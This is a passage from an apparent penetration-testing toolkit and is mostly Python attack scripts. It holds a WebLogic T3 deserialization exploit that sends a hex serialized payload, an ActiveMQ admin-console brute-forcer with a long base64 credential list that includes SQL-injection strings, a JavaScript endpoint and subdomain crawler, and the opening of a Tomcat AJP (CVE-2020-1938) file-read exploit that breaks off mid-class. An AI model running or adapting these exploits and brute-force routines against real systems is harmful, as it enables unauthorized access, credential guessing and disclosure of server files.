    payload+='fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff'
    payload = '%s%s'%('{:08x}'.format(len(payload)/2 + 4),payload)
    sock.send(payload.decode('hex'))
    time.sleep(2)
    sock.send(payload.decode('hex'))
    res = ''
    try:
        while True:
            res += sock.recv(4096)
            time.sleep(0.1)
    except Exception as e:
        # Expected exit path: the socket timeout ends the read loop.
        pass
    return res
48 |
def checkVul(res,server_addr,index):
    """Search ``res`` for VER_SIG[index] and print the verdict for server_addr; returns None."""
    p=re.findall(VER_SIG[index], res, re.S)
    if len(p)>0:
        print '%s:%d is vul %s'%(server_addr[0],server_addr[1],VUL[index])
    else:
        print '%s:%d is not vul %s' % (server_addr[0],server_addr[1],VUL[index])
55 |
def run(dip,dport,index):
    """Open a TCP socket to (dip, dport), run the exchange and print the verdict via checkVul().

    NOTE(review): the socket is never closed explicitly.
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    ## After the patch is applied the read blocks, so a timeout is set
    ## (the original note says 15 s by default; the code uses 65 s — adjust as needed)
    sock.settimeout(65)
    server_addr = (dip, dport)
    t3handshake(sock,server_addr)
    buildT3RequestObject(sock,dport)
    rs=sendEvilObjData(sock,PAYLOAD[index])
    # print 'rs',rs  # a strange error showed up here during local testing
    checkVul(rs,server_addr,index)
66 |
if __name__=="__main__":
    dip = sys.argv[1]
    dport = int(sys.argv[2])
    print 'Test Address:', dip, dport
    try:
        run(dip,dport,0)
    except:
        # Bare except: any failure (socket error, timeout, bad input) is
        # printed as "is not vul", so this line is not a negative result by itself.
        print(dport,dip,'is not vul.')
75 |
--------------------------------------------------------------------------------
/activemq_vuln/Activemq_weakpasswd.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | import requests
3 | import base64
4 |
5 | '''
6 | Usage:
7 | moon.py -u activemq http://xx.xx.xx.xx:xxxx
8 | http://xx.xx.xx.xx:8161/admin/ 弱口令 admin admin
9 | '''
10 |
def attack(URL):
    """Check whether URL/admin answers 401 and, if so, try the built-in credential list.

    ``passwords`` holds base64 "user:password" pairs sent as Basic
    Authorization headers; the first 200 response is printed and the loop
    stops. Nothing is returned.

    Detection note: every attempt is one GET of /admin carrying a Basic
    Authorization header, so on the target this shows up as a burst of 401
    responses to a single client.
    NOTE(review): none of the requests.get() calls set a timeout, so a
    silent target can block this check indefinitely.
    """
    print('[+]开始检测-ActiveMQ弱口令。[+]')
    url = URL +'/admin'
    user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
    headers={"User-Agent":user_agent}
    passwords = ['YWRtaW46IUAjJCVeJio=', 'YWRtaW46IUAjJCVeJg==', 'YWRtaW46IUAjJCVe', 'YWRtaW46IUAjJCU=', 'YWRtaW46IUAjJA==', 'YWRtaW46QCMkJV4m', 'YWRtaW46MA==', 'YWRtaW46MDAwMDAw', 'YWRtaW46MDAwMDAwYQ==', 'YWRtaW46MTAwMjAw', 'YWRtaW46MTAxMDEw', 'YWRtaW46MTEwMTEw', 'YWRtaW46MTEwMTIw', 'YWRtaW46MTEwMTIwMTE5', 'YWRtaW46MTExMTE=', 'YWRtaW46MTExMTEx', 'YWRtaW46MTExMTExMQ==', 'YWRtaW46MTExMTExMTE=', 'YWRtaW46MTExMTExMTEx', 'YWRtaW46MTExMTExMTExMQ==', 'YWRtaW46MTExMTExYQ==', 'YWRtaW46MTExMjIy', 'YWRtaW46MTEyMjMz', 'YWRtaW46MTEyMjMzNDQ=', 'YWRtaW46MTEyMzU4MTMyMQ==', 'YWRtaW46MTIxMjEy', 'YWRtaW46MTIxMjEyMTI=', 'YWRtaW46MTIz', 'YWRtaW46MTIzMDAw', 'YWRtaW46MTIzMTIz', 'YWRtaW46MTIzMTIzMTIz', 'YWRtaW46MTIzMTIzYQ==', 'YWRtaW46MTIzMzIx', 'YWRtaW46MTIzNA==', 'YWRtaW46MTIzNDQzMjE=', 'YWRtaW46MTIzNDU=', 'YWRtaW46MTIzNDU1NDMyMQ==', 'YWRtaW46MTIzNDU2Li4=', 'YWRtaW46MTIzNDU2', 'YWRtaW46MTIzNDU2Nw==', 'YWRtaW46MTIzNDU2Nzg=', 'YWRtaW46MTIzNDU2Nzg5Li4=', 'YWRtaW46MTIzNDU2Nzg5', 'YWRtaW46MTIzNDU2Nzg5MA==', 'YWRtaW46MTIzNDU2Nzg5MDA=', 'YWRtaW46MTIzNDU2Nzg5MQ==', 'YWRtaW46MTIzNDU2Nzg5MTA=', 'YWRtaW46MTIzNDU2Nzg5OQ==', 'YWRtaW46MTIzNDU2Nzg5YQ==', 'YWRtaW46MTIzNDU2Nzg5YWJj', 'YWRtaW46MTIzNDU2Nzg5cQ==', 'YWRtaW46MTIzNDU2Nzg5cXE=', 'YWRtaW46MTIzNDU2YQ==', 'YWRtaW46MTIzNDU2YWE=', 'YWRtaW46MTIzNDU2YUFA', 'YWRtaW46MTIzNDU2YWJj', 'YWRtaW46MTIzNDU2YXNk', 'YWRtaW46MTIzNDU2cQ==', 'YWRtaW46MTIzNDU2cXE=', 'YWRtaW46MTIzNDVh', 'YWRtaW46MTIzNHF3ZXI=', 'YWRtaW46MTIzNjU0', 'YWRtaW46MTIzNjU0Nzg5', 'YWRtaW46MTIzNjk4NzQ1', 'YWRtaW46MTIzYWJj', 'YWRtaW46MTIzcXdl', 'YWRtaW46MTIzcXdlYXNk', 'YWRtaW46MTIzJHF3ZVI=', 'YWRtaW46MTJxd2Fzeng=', 'YWRtaW46MTMxMzEz', 'YWRtaW46MTMxNDUyMA==', 'YWRtaW46MTMxNDUyMDUyMA==', 'YWRtaW46MTMxNDUyMQ==', 'YWRtaW46MTM1NzkyNDY4', 'YWRtaW46MTM1NzkyNDY4MA==', 'YWRtaW46MTQ3MjU4', 'YWRtaW46MTQ3MjU4MzY5', 'YWRtaW46MTQ3MjU4MzY5MA==', 'YWRtaW46MTU5MzU3', 'YWRtaW46MTU5NzUz', 'YWRtaW46MTYzLmNvbQ==', 'YWRtaW46MTY4MTY4', 'YWRtaW46MUEyQjNDNEQ=', 'YWRtaW46MWcydzNlNHI=', 'YWRtaW46MSBvciAxPTE=', 
'YWRtaW46MScgb3IgJzEnPScx', 'YWRtaW46MSIgb3IgIjEiPSIx', 'YWRtaW46MScgb3JkZXIgYnkgMS0t', 'YWRtaW46MScgb3JkZXIgYnkgMTAtLQ==', 'YWRtaW46MXAybzNp', 'YWRtaW46MXEydzNl', 'YWRtaW46MXEydzNlNHI=', 'YWRtaW46MXEydzNlNHI1dA==', 'YWRtaW46MXFhejJ3c3g=', 'YWRtaW46MXFheiFRQVo=', 'YWRtaW46MXFhekBXU1g=', 'YWRtaW46MXFhenhzdzI=', 'YWRtaW46MjIyMjIy', 'YWRtaW46MjIyMjIyMg==', 'YWRtaW46MjIyMjIyMjI=', 'YWRtaW46MzE0MTU5MjY=', 'YWRtaW46MzMzMzMz', 'YWRtaW46M2VkYyRSRlY=', 'YWRtaW46NDU2ODUy', 'YWRtaW46NTIwMTMxNA==', 'YWRtaW46NTIwMTMxNDUyMA==', 'YWRtaW46NTIwMTMxNGE=', 'YWRtaW46NTIwNTIw', 'YWRtaW46NTIxMTMxNA==', 'YWRtaW46NTIxNTIx', 'YWRtaW46NTU1NTU1', 'YWRtaW46NTU1NTU1NTU=', 'YWRtaW46NTg0MTMxNDUyMA==', 'YWRtaW46NTg0NTIw', 'YWRtaW46NTg0NTIwMTMxNA==', 'YWRtaW46NjU0MzIx', 'YWRtaW46NjY2NjY2', 'YWRtaW46NjY2ODg4', 'YWRtaW46NzQxODUyOTYz', 'YWRtaW46NzUzOTUx', 'YWRtaW46Nzc1ODI1OA==', 'YWRtaW46Nzc1ODUyMQ==', 'YWRtaW46Nzc3Nzc3', 'YWRtaW46Nzc3Nzc3Nw==', 'YWRtaW46Nzc3Nzc3Nzc=', 'YWRtaW46Nzg5NDU2', 'YWRtaW46Nzg5NDU2MTIz', 'YWRtaW46Nzg5NDU2MTIzMA==', 'YWRtaW46NzkwMTE5', 'YWRtaW46ODA0ODY=', 'YWRtaW46ODg4ODg4', 'YWRtaW46ODg4ODg4ODg=', 'YWRtaW46ODg4OTk5', 'YWRtaW46OTYwNjI4', 'YWRtaW46OTg3NjU0', 'YWRtaW46OTg3NjU0MzIx', 'YWRtaW46OTg3NjU0MzIxMA==', 'YWRtaW46OTk5OTk5', 'YWRtaW46OTk5OTk5OTk=', 'YWRtaW46OTk5OTk5OTk5', 'YWRtaW46YTAwMDAwMA==', 'YWRtaW46YTExMTExMQ==', 'YWRtaW46YTEyMzEyMw==', 'YWRtaW46YTEyMzMyMQ==', 'YWRtaW46YTEyMzQ1', 'YWRtaW46YTEyM180NTY=', 'YWRtaW46YTEyMzQ1Ng==', 'YWRtaW46YTEyMzQ1Njc4', 'YWRtaW46YTEyMzQ1Njc4OQ==', 'YWRtaW46YTFiMmMz', 'YWRtaW46YTUyMDEzMTQ=', 'YWRtaW46QWFAMTIzNDU=', 'YWRtaW46QWFAMTIzNDU2', 'YWRtaW46QWExMjM0NTYh', 'YWRtaW46QWExMjM0NTYu', 'YWRtaW46QWExMjM0NTY=', 'YWRtaW46QWExMjM0NTY3IQ==', 'YWRtaW46YWExMjM0NTY3ODk=', 'YWRtaW46YWFhMTEx', 'YWRtaW46YWFhMTIz', 'YWRtaW46YWFhMTIzNDU2', 'YWRtaW46YWFhYWFh', 'YWRtaW46YWJjMTIz', 'YWRtaW46YWJjMTIzNDU2', 'YWRtaW46YWJjMTIzNDU2Nzg5', 'YWRtaW46YWJjYWJj', 'YWRtaW46YWJjZDEyMw==', 'YWRtaW46YWJjZDEyMzQ=', 'YWRtaW46YWJjZDEyMzQ1Ng==', 'YWRtaW46YWJjZGVm', 
'YWRtaW46YWRtaW4=', 'YWRtaW46YWRtaW44ODg=', 'YWRtaW46YWRtaW5pc3RyYXRvcg==', 'YWRtaW46YWluaTEzMTQ=', 'YWRtaW46YXB0eDQ4Njk=', 'YWRtaW46YXMxMjM0NTY=', 'YWRtaW46YXNkMTIz', 'YWRtaW46YXNkMTIzNDU2', 'YWRtaW46YXNkYXNk', 'YWRtaW46YXNkYXNkMTIz', 'YWRtaW46YXNkZg==', 'YWRtaW46YXNkZmdo', 'YWRtaW46YXNkZmdoamts', 'YWRtaW46YmFuZ29uZ3NoaQ==', 'YWRtaW46Y2FvbmltYQ==', 'YWRtaW46Y2FvbmltYTEyMw==', 'YWRtaW46Y29tcHV0ZXI=', 'YWRtaW46Zm9vdGJhbGw=', 'YWRtaW46ZnVja3lvdQ==', 'YWRtaW46ZnVja3lvdTE=', 'YWRtaW46Z3dlcnR5', 'YWRtaW46Z3dlcnR5MTIz', 'YWRtaW46aGVsbG8xMjM0', 'YWRtaW46aWxvdmV5b3U=', 'YWRtaW46aWxvdmV5b3Ux', 'YWRtaW46bG92ZQ==', 'YWRtaW46bG92ZTEyMw==', 'YWRtaW46bG92ZTEzMTQ=', 'YWRtaW46bXlzcGFjZTE=', 'YWRtaW46bmloYW8xMjM=', 'YWRtaW46bnVsbA==', 'YWRtaW46cGFzc3dk', 'YWRtaW46cGFzc3dvcmQ=', 'YWRtaW46cGFzc3dvcmQx', 'YWRtaW46UGFzc3dvcmQy', 'YWRtaW46UG1zQDEyMzQ=', 'YWRtaW46cHJpbmNlc3M=', 'YWRtaW46cHJpbmNlc3Mx', 'YWRtaW46UEBzc3cwcmQ=', 'YWRtaW46cEBzc3dvcmQ=', 'YWRtaW46cTEyMzQ1Ng==', 'YWRtaW46cTEyMzQ1Njc4OQ==', 'YWRtaW46cTF3MmUz', 'YWRtaW46cTF3MmUzcjQ=', 'YWRtaW46cTF3MkUjUiQ=', 'YWRtaW46UUFaMTIz', 'YWRtaW46cWF6MTIzNDU2', 'YWRtaW46IVFBWjJ3c3g=', 'YWRtaW46cWF6d3N4', 'YWRtaW46cWF6d3N4MTIz', 'YWRtaW46cWF6d3N4ZWRj', 'YWRtaW46IVFBWnhzdzI=', 'YWRtaW46cWF6eHN3MjE=', 'YWRtaW46cXExMjMxMjM=', 'YWRtaW46cXExMjM0NTY=', 'YWRtaW46cXExMjM0NTY3ODk=', 'YWRtaW46cXExMzE0NTIw', 'YWRtaW46cXE1MjAxMzE0', 'YWRtaW46cXdlMTIz', 'YWRtaW46cXdlMTIzNDU2', 'YWRtaW46cXdlYXNk', 'YWRtaW46cXdlcjEyMzQ=', 'YWRtaW46cXdlcnR5', 'YWRtaW46cXdlcnR5MQ==', 'YWRtaW46UXdlcnR5MTI=', 'YWRtaW46cXdlcnR5MTIz', 'YWRtaW46UXdlcnR5MTIzNDU=', 'YWRtaW46cXdlcnR5dWlvcA==', 'YWRtaW46cm9vdA==', 'YWRtaW46cm9vdEBXSlM=', 'YWRtaW46czEyMzQ1Ng==', 'YWRtaW46c3Vuc2hpbmU=', 'YWRtaW46dGFyZ2V0MTIz', 'YWRtaW46dGVzdA==', 'YWRtaW46dGVzdDEyMw==', 'YWRtaW46dGVzdGo=', 'YWRtaW46VXNAMTIzNDU=', 'YWRtaW46dXNlcm5hbWU=', 'YWRtaW46VXNyMTIzNDU=', 'YWRtaW46dzEyMzQ1Ng==', 'YWRtaW46dzEyMzQ1Njc4OQ==', 'YWRtaW46d2FuZzEyMw==', 'YWRtaW46d2FuZzEyMzQ1Ng==', 'YWRtaW46d29haW5p', 
'YWRtaW46d29haW5pMTIz', 'YWRtaW46d29haW5pMTMxNA==', 'YWRtaW46d29haW5pMTMxNDUyMA==', 'YWRtaW46d29haW5pNTIw', 'YWRtaW46d29haW5pNTIx', 'YWRtaW46QFdTWGNkZTM=', 'YWRtaW46V3dfMTIzNDU2', 'YWRtaW46d3d3MTIzNDU2', 'YWRtaW46ejEyMzQ1Ng==', 'YWRtaW46ejEyMzQ1Njc4OQ==', 'YWRtaW46emFxMTJ3c3g=', 'YWRtaW46WkFRITJ3c3g=', 'YWRtaW46emhhbmcxMjM=', 'YWRtaW46enhjMTIz', 'YWRtaW46enhjMTIzNDU2', 'YWRtaW46enhjdmJubQ==', 'YWRtaW46enhjdmJubTEyMw==', 'YWRtaW46VGVzdDEyMyQ=', 'YWRtaW46MXEydzNlNHI1dA==']
    try:
        # NOTE(review): this first GET is redundant — its response is discarded
        # and the identical request is repeated on the next line.
        requests.get(url, headers=headers)
        verify_response = requests.get(url, headers=headers)
        if verify_response.status_code == 401:
            print('[*]存在web管理界面,开始爆破:'+url)
            for passwd in passwords:
                try:
                    headers={"User-Agent":user_agent,"Authorization":'Basic '+passwd}
                    verify_response = requests.get(url, headers=headers)
                    if verify_response.status_code == 200:
                        print('发现弱口令:'+str(base64.b64decode(passwd), "utf-8"))
                        break
                except Exception:
                    # NOTE(review): per-attempt errors are dropped silently, so a
                    # target that starts refusing connections mid-list looks like "no hit".
                    pass
        else:
            print('未发现管理页面:'+url)
    except Exception:
        print("检测错误,未发现漏洞。")
    print('[+]检测结束-ActiveMQ弱口令。[+]')
    print('\n')
37 |
38 |
if __name__ == "__main__":
    # NOTE(review): attack() requires a URL; this bare call raises TypeError.
    attack()
41 |
--------------------------------------------------------------------------------
/js_find/js_find.py:
--------------------------------------------------------------------------------
1 |
2 | # coding: utf-8
3 | # 此页面代码主体修改自 https://threezh1.github.io/ By Threezh1
4 |
5 | import requests, argparse, sys, re
6 | from requests.packages import urllib3
7 | from urllib.parse import urlparse
8 | from bs4 import BeautifulSoup
9 |
10 |
def parse_args():
    """Build the standalone command-line parser and parse sys.argv."""
    example = '\tExample: \r\npython ' + sys.argv[0] + " -u http://www.baidu.com"
    parser = argparse.ArgumentParser(epilog=example)
    # (flags, keyword arguments) in the order they appear in --help.
    options = [
        (("-u", "--url"), {"help": "The website"}),
        (("-f", "--file"), {"help": "The file contains url or js"}),
        (("-ou", "--outputurl"), {"help": "Output file name. "}),
        (("-os", "--outputsubdomain"), {"help": "Output file name. "}),
        (("-j", "--js"), {"help": "Find in js file", "action": "store_true"}),
        (("-d", "--deep"), {"help": "Deep find", "action": "store_true"}),
    ]
    for flags, kwargs in options:
        parser.add_argument(*flags, **kwargs)
    return parser.parse_args()
20 |
21 |
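# Regular expression comes from https://github.com/GerbenJavado/LinkFinder
def extract_URL(JS):
    """Return the quoted URL-like strings found in *JS*, in order of first occurrence.

    Args:
        JS: script or page text. Any value is accepted and passed through
            str(), so None simply yields no matches.

    Returns:
        list[str]: matches with the surrounding quotes removed, de-duplicated
        while preserving order. Always a list — the old ``result == None``
        branch could never fire (finditer never returns None), and the old
        ``js_url`` list was never filled, so duplicates leaked through.
    """
    pattern_raw = r"""
(?:"|') # Start newline delimiter
(
((?:[a-zA-Z]{1,10}://|//) # Match a scheme [a-Z]*1-10 or //
[^"'/]{1,}\. # Match a domainname (any character + dot)
[a-zA-Z]{2,}[^"']{0,}) # The domainextension and/or path
|
((?:/|\.\./|\./) # Start with /,../,./
[^"'><,;| *()(%%$^/\\\[\]] # Next character can't be...
[^"'><,;|()]{1,}) # Rest of the characters can't be
|
([a-zA-Z0-9_\-/]{1,}/ # Relative endpoint with /
[a-zA-Z0-9_\-/]{1,} # Resource name
\.(?:[a-zA-Z]{1,4}|action) # Rest + extension (length 1-4 or action)
(?:[\?|/][^"|']{0,}|)) # ? mark with parameters
|
([a-zA-Z0-9_\-]{1,} # filename
\.(?:php|asp|aspx|jsp|json|
action|html|js|txt|xml) # . + extension
(?:\?[^"|']{0,}|)) # ? mark with parameters
)
(?:"|') # End newline delimiter
"""
    pattern = re.compile(pattern_raw, re.VERBOSE)
    seen = set()
    found = []
    for match in pattern.finditer(str(JS)):
        # The pattern deliberately includes the delimiting quotes; drop them.
        candidate = match.group().strip('"').strip("'")
        if candidate in seen:
            continue
        seen.add(candidate)
        found.append(candidate)
    return found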
54 |
55 |
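# Get the page source
def Extract_html(URL):
    """Fetch *URL* and return its body decoded as UTF-8 (undecodable bytes dropped).

    Returns:
        str | None: the page text, or None when the request fails for any
        reason (3 s timeout, connection error, malformed URL, ...).

    Note: certificate verification is disabled (verify=False), so the body
    of an https:// page is not authenticated.
    """
    header = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.108 Safari/537.36"}
    try:
        raw = requests.get(URL, headers = header, timeout=3, verify=False)
    except Exception:
        # Narrowed from a bare except so KeyboardInterrupt still stops a crawl.
        return None
    return raw.content.decode("utf-8", "ignore")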
65 |
66 |
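# Handling relative URLs
def process_url(URL, re_URL):
    """Resolve a link found on *URL* to an absolute URL using the page's scheme and host.

    Rules, in order: prefixes in ``black_url`` give back *URL* itself;
    ``//host/...`` gets the page scheme; ``http...`` is returned unchanged;
    ``/p``, ``../p`` and ``./p`` are attached to the host (the dot prefixes
    are dropped, not resolved against the page path); anything else is
    attached under ``/``.

    The blacklist is now a prefix match: previously only the exact string
    "javascript:" was filtered, so e.g. "javascript:void(0)" was turned into
    a bogus absolute URL.
    """
    black_url = ["javascript:"]  # Add some keyword for filter url.
    parts = urlparse(URL)
    scheme = parts.scheme
    host = parts.netloc
    if re_URL.startswith(tuple(black_url)):
        return URL
    if re_URL.startswith("//"):
        return scheme + ":" + re_URL
    if re_URL.startswith("http"):
        return re_URL
    if re_URL.startswith("/"):
        return scheme + "://" + host + re_URL
    if re_URL.startswith(".."):
        return scheme + "://" + host + re_URL[2:]
    if re_URL.startswith("."):
        return scheme + "://" + host + re_URL[1:]
    return scheme + "://" + host + "/" + re_URL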
91 |
92 |
def find_last(string,str):
    """Return every index at which the second argument occurs in *string*.

    Overlapping occurrences are all reported; an empty list means no hit.
    """
    hits = []
    idx = string.find(str)
    while idx != -1:
        hits.append(idx)
        idx = string.find(str, idx + 1)
    return hits
102 |
103 |
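def find_by_url(url, js = False):
    """Collect URL-like strings reachable from *url*.

    With js=False the page is fetched, inline <script> bodies and external
    scripts are scanned with extract_URL(), each hit is resolved with
    process_url() relative to the script it came from, and only hits whose
    host contains the page's last two domain labels (or that have no host)
    are kept, de-duplicated in order. With js=True *url* itself is treated
    as a script and the sorted unique matches are returned.

    Returns:
        list[str] | None: None when the page cannot be fetched (js=False)
        or when nothing matched (js=True).
    """
    if not js:
        html_raw = Extract_html(url)
        if html_raw is None:
            print("Fail to access " + url)
            return None
        html = BeautifulSoup(html_raw, "html.parser")
        script_array = {}
        script_temp = ""
        for html_script in html.find_all("script"):
            script_src = html_script.get("src")
            if script_src is None:
                script_temp += html_script.get_text() + "\n"
            else:
                purl = process_url(url, script_src)
                script_array[purl] = Extract_html(purl)
        script_array[url] = script_temp
        allurls = []
        for script in script_array:
            temp_urls = extract_URL(script_array[script])
            if not temp_urls:
                continue
            for temp_url in temp_urls:
                allurls.append(process_url(script, temp_url))
        # Hoisted out of the loop below: the page's own domain does not change.
        domain = urlparse(url).netloc
        positions = find_last(domain, ".")
        miandomain = domain
        if len(positions) > 1:
            miandomain = domain[positions[-2] + 1:]
        result = []
        for singerurl in allurls:
            subdomain = urlparse(singerurl).netloc
            if miandomain in subdomain or subdomain.strip() == "":
                if singerurl.strip() not in result:
                    result.append(singerurl)
        return result
    return sorted(set(extract_URL(Extract_html(url)))) or None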
142 |
143 |
def find_subdomain(urls, mainurl):
    """Return the distinct hosts in *urls* that contain the last two labels of mainurl's host.

    URLs without a host are ignored; order of first appearance is kept.
    """
    base_host = urlparse(mainurl).netloc
    dots = find_last(base_host, ".")
    registrable = base_host[dots[-2] + 1:] if len(dots) > 1 else base_host
    hosts = []
    for candidate in urls:
        host = urlparse(candidate).netloc
        if not host.strip():
            continue
        if registrable in host and host not in hosts:
            hosts.append(host)
    return hosts
159 |
160 |
def find_by_url_deep(url):
    """Fetch *url*, follow every <a href> on it and merge find_by_url() over those links.

    Prints progress per link. Returns the de-duplicated URLs, or None when
    the page cannot be fetched or holds no links.
    """
    html_raw = Extract_html(url)
    if html_raw is None:
        print("Fail to access " + url)
        return None
    soup = BeautifulSoup(html_raw, "html.parser")
    links = []
    for anchor in soup.findAll("a"):
        href = anchor.get("href")
        if not href:
            continue
        resolved = process_url(url, href)
        if resolved not in links:
            links.append(resolved)
    if not links:
        return None
    print("ALL Find " + str(len(links)) + " links")
    urls = []
    remaining = len(links)
    for link in links:
        found = find_by_url(link)
        if found is None:
            continue
        print("Remaining " + str(remaining) + " | Find " + str(len(found)) + " URL in " + link)
        for candidate in found:
            if candidate not in urls:
                urls.append(candidate)
        remaining -= 1
    return urls
188 |
189 |
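def find_by_file(file_path, js=False):
    """Run find_by_url on every non-blank line of *file_path* and merge the results.

    Args:
        file_path: text file with one URL per line.
        js: when true, find_by_url is called with ``js=True``.

    Returns:
        De-duplicated list of URLs in order of first appearance, or None when
        the file contains no non-blank lines. Progress is printed per line.
    """
    with open(file_path, "r", encoding="utf-8") as fobject:
        # Drop blank lines: split("\n") on a file ending in a newline yields a
        # trailing "" that the original handed to find_by_url as a URL, and the
        # original `links == []` check could never be true for the same reason.
        links = [line for line in fobject.read().split("\n") if line.strip()]
    if not links:
        return None
    print("ALL Find " + str(len(links)) + " links")
    urls = []
    # Count down in lockstep with the loop; the original only decremented after
    # a successful fetch, so failed lines skewed the printed counter.
    for remaining, link in zip(range(len(links), 0, -1), links):
        if js:
            temp_urls = find_by_url(link, js=True)
        else:
            temp_urls = find_by_url(link)
        if temp_urls is None:
            continue
        print(str(remaining) + " Find " + str(len(temp_urls)) + " URL in " + link)
        for temp_url in temp_urls:
            if temp_url not in urls:
                urls.append(temp_url)
    return urls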
209 |
210 |
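def giveresult(urls, domian):
    """Print status code and body length for each URL, then the hostnames they span.

    Each URL is fetched exactly once; the original issued two identical GETs per
    URL (one for the status code, one for the body). A failed fetch is printed
    and the next URL is tried. Finally find_subdomain(urls, domian) is listed.

    Args:
        urls: URLs to probe.
        domian: base URL whose domain filters the hostnames (parameter name
            kept as in the original so existing callers keep working).
    """
    print("Find " + str(len(urls)) + " URL:")
    # One header dict for every request; nothing below mutates it.
    headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36', 'Connection': 'close'}
    for url in urls:
        try:
            # verify=False is kept from the original: TLS certificates are not
            # validated, so a response from a mis-issued or intercepted host is
            # reported like any other.
            response = requests.get(url, headers=headers, timeout=60, verify=False)
            print('status_code:', ' ', str(response.status_code), ' ', 'response_len:', str(len(response.text)), ' ', url)
        except Exception as e:
            print(url, '页面访问错误:', f'Error2: {str(e)}')
    subdomains = find_subdomain(urls, domian)
    print("\nFind " + str(len(subdomains)) + " Subdomain:")
    for subdomain in subdomains:
        print(subdomain)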
228 |
229 |
def attack(URL):
    """Entry point: crawl *URL* once with find_by_url, report via giveresult, then crawl one level deeper.

    Each phase is wrapped in its own broad except so a failure only prints the
    matching "[-]" line. Note that the deep-crawl result is assigned but never
    printed or returned, so the second phase only reports success or failure.
    """
    # Silence urllib3 warnings (e.g. for the verify=False requests in giveresult).
    urllib3.disable_warnings()
    args_url = URL
    try:
        urls = find_by_url(args_url)
        # giveresult calls len(urls); a None from find_by_url lands in the except below.
        giveresult(urls, args_url)
        print('[+]当前页面爬取完毕!')
    except Exception:
        print('[-]当前页面爬取失败!')
    try:
        urls = find_by_url_deep(args_url)
        print('[+]深度爬取成功!')
    except Exception:
        print('[-]深度爬取失败!')
244 |
245 |
if __name__ == "__main__":
    # NOTE(review): attack() takes a required URL argument (see its definition
    # above), so running this file as a script raises TypeError here.
    attack()
248 |
--------------------------------------------------------------------------------
/tomcat/CVE_2020_1938.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | # CNVD-2020-10487 / CVE-2020-1938
3 | # https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi/blob/master/CNVD-2020-10487-Tomcat-Ajp-lfi.py 核心代码出自此处
4 | from socket import *
5 | import struct
6 | from io import StringIO
7 |
8 |
9 | '''
10 | Usage:
11 | moon.py -u tomcat http://127.0.0.1:8080
12 | 上面链接带不带端口无所谓,不带端口默认检测8009,带端口会检测链接中的端口和8009,不会检测两次8009
13 | 受影响版本
14 |
15 | Apache Tomcat 6
16 | Apache Tomcat 7 < 7.0.100
17 | Apache Tomcat 8 < 8.5.51
18 | Apache Tomcat 9 < 9.0.31
19 | 不受影响版本
20 | 1. Apache Tomcat = 7.0.100
21 | 2. Apache Tomcat = 8.5.51
22 | 3. Apache Tomcat = 9.0.31
23 | '''
24 |
25 |
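def pack_string(s):
    """Encode *s* as an AJP string: big-endian 2-byte length, UTF-8 bytes, NUL terminator.

    ``None`` is encoded as the 2-byte length -1 (0xFFFF) with no body, which is
    the null-string form that ``unpack_string`` recognises.

    Args:
        s: text to encode, or ``None``.

    Returns:
        The packed ``bytes``.
    """
    if s is None:
        return struct.pack(">h", -1)
    # Measure the encoded bytes, not the str: a non-ASCII character is more than
    # one UTF-8 byte, and the original len(s) made "%ds" silently truncate the
    # body while still announcing the character count as the length.
    encoded = s.encode('utf8')
    size = len(encoded)
    return struct.pack(">H%dsb" % size, size, encoded, 0)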
31 |
32 |
def unpack(stream, fmt):
    """Read exactly the number of bytes *fmt* describes from *stream* and unpack them.

    Returns the tuple produced by ``struct.unpack``; a short read surfaces as
    ``struct.error`` from that call.
    """
    needed = struct.calcsize(fmt)
    return struct.unpack(fmt, stream.read(needed))
37 |
38 |
def unpack_string(stream):
    """Decode one AJP string from *stream* (the inverse of pack_string).

    A 2-byte signed big-endian length of -1 means a null string and yields
    ``None``; otherwise that many raw bytes are returned and the trailing
    NUL byte is consumed and discarded.
    """
    (length,) = unpack(stream, ">h")
    if length == -1:  # null string
        return None
    (body,) = unpack(stream, "%ds" % length)
    stream.read(1)  # the terminating \0
    return body
46 |
47 |
class NotFoundException(Exception):
    """Plain Exception subclass; defined here but not raised anywhere in the visible code."""
50 |
51 |
class AjpBodyRequest(object):
    """Streams a request body to the container as AJP body-chunk packets.

    Each serialize() call consumes up to MAX_REQUEST_LENGTH bytes from
    data_stream and frames them; an empty frame (header only) marks the end.
    """
    # server == web server, container == servlet
    SERVER_TO_CONTAINER, CONTAINER_TO_SERVER = range(2)
    MAX_REQUEST_LENGTH = 8186

    def __init__(self, data_stream, data_len, data_direction=None):
        self.data_stream = data_stream
        # Stored but not read by any method in this class.
        self.data_len = data_len
        self.data_direction = data_direction

    def serialize(self):
        """Return the next body-chunk packet: magic, 2-byte length, 2-byte chunk size, chunk bytes.

        When data_stream is exhausted the result is the 4-byte header with a
        zero length, which send_and_receive treats as the terminating frame.
        """
        data = self.data_stream.read(AjpBodyRequest.MAX_REQUEST_LENGTH)
        if len(data) == 0:
            return struct.pack(">bbH", 0x12, 0x34, 0x00)
        else:
            res = struct.pack(">H", len(data))
            res += data
            # 0x12 0x34 is the server->container magic, 0x41 0x42 ('AB') the reverse.
            if self.data_direction == AjpBodyRequest.SERVER_TO_CONTAINER:
                header = struct.pack(">bbH", 0x12, 0x34, len(res))
            else:
                header = struct.pack(">bbH", 0x41, 0x42, len(res))
            return header + res

    def send_and_receive(self, socket, stream):
        """Send body chunks until the container answers SEND_HEADERS or the empty frame has been sent.

        After each chunk, packets are read from *stream* until a GET_BODY_CHUNK
        or SEND_HEADERS arrives; other packet types are consumed and ignored.
        Returns None. Note that socket.send() may transmit fewer bytes than
